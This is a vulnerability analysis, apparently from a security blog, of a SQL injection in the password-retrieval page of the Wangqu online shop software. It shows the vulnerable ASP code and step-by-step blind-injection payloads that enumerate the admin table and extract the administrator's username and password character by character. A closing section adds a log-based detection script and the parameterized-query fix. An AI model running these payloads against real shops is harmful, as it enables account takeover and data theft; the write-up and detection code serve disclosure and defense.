Analysis of SQL injection vulnerability in Online Shopping System of Wangqu


Author: cnryan @ http://hi.baidu.com/cnryan

Wangqu Online Shopping System is a simple, powerful and widely used online shop platform. With years of R&D experience behind it, increasingly complete software functions and a large user base, it has become the preferred choice of many online shop operators.

The analysis below uses the official demo.
The SQL injection is in the password-retrieval function. The latest version, 9.4, is affected, and later tests showed that versions before v9.0 are all affected as well.

Vulnerability page: getpwd2.asp

Vulnerability code:
<%
' The submitted user name is taken from the form and concatenated straight into the SQL text
username = request.form("username")
Set rs = Server.CreateObject("Adodb.Recordset")
sql = "select * from [user] where username='" & username & "'"
rs.open sql, conn, 1, 1
If rs.eof Then
%>

The injection is the classic kind, the same as in the earlier version of the Online Shopping System.

http://127.0.0.1/cnhww9.4/getpwd.asp
getpwd.asp is the password-retrieval page; the user name entered there is submitted to getpwd2.asp, which checks whether the user name exists. If it does, the page goes on to step 2; otherwise it stops.

Enter: test' and 1=1 and '='
Jumps to step 2 of getpwd2.asp

Enter: test' and 1=2 and '='
Prompts that this user does not exist


Guessing the table name -> cnhww

test' and exists (select * from [admin]) and '1'='1    F
test' and exists (select * from [cnhww]) and '1'='1    T


Guessing the field names -> admin, password
test' and exists (select admin from [cnhww]) and '1'='1       T
test' and exists (select password from [cnhww]) and '1'='1    T

Extracting the values -->
test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>97 and '1'='1    F
test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>96 and '1'='1    T
97 = a
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>100 and '1'='1   F
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>99 and '1'='1    T
100 = d

......


test' and (select top 1 asc(mid(password,1,1)) from cnhww)>55 and '1'='1

......

......
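A detection angle, added here and not part of the original write-up: a boolean-blind extraction like the one above needs one POST to getpwd2.asp per comparison, so it shows up in the IIS log as a burst of POSTs to a single page from one client, even though the submitted user name itself is not in a standard W3C log. The script below parses a constructed W3C-format excerpt and flags any client that exceeds a threshold of POSTs to the page inside a sliding window. The log lines, the client addresses, the 60-second window and the threshold of 20 are all assumptions for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def build_sample_log():
    """Constructed IIS W3C-style excerpt (assumed for the example, not a real log)."""
    lines = ["#Fields: date time cs-method cs-uri-stem c-ip sc-status",
             # one ordinary password-retrieval attempt by a normal visitor
             "2009-03-01 09:58:10 GET /cnhww9.4/getpwd.asp 10.0.0.5 200",
             "2009-03-01 09:58:40 POST /cnhww9.4/getpwd2.asp 10.0.0.5 200"]
    # Boolean-blind probing: one POST per second for 45 seconds from one address
    base = datetime(2009, 3, 1, 10, 0, 0)
    for i in range(45):
        t = base + timedelta(seconds=i)
        lines.append(f"{t:%Y-%m-%d %H:%M:%S} POST /cnhww9.4/getpwd2.asp 203.0.113.7 200")
    return "\n".join(lines)

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_blind_probing(entries, page="/getpwd2.asp", window_s=60, threshold=20):
    """Return {client_ip: peak count} for clients that sent at least `threshold`
    POSTs to `page` inside any `window_s`-second window. Records are assumed to
    be in chronological order, as IIS writes them."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)   # per-client timestamps still inside the window
    flagged = {}
    for e in entries:
        if e["cs-method"] != "POST" or not e["cs-uri-stem"].lower().endswith(page):
            continue
        ts = datetime.strptime(e["date"] + " " + e["time"], "%Y-%m-%d %H:%M:%S")
        q = recent[e["c-ip"]]
        q.append(ts)
        while ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[e["c-ip"]] = max(flagged.get(e["c-ip"], 0), len(q))
    return flagged

if __name__ == "__main__":
    print(find_blind_probing(parse_w3c(build_sample_log())))   # {'203.0.113.7': 45}
```

Because the default IIS log carries no request body, this keys on volume per client rather than on the injected condition; a slow or distributed extraction will stay under the threshold, so treat it as a monitoring aid. The durable fix is the parameterized query in getpwd2.asp, which leaves nothing for the probes to measure.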
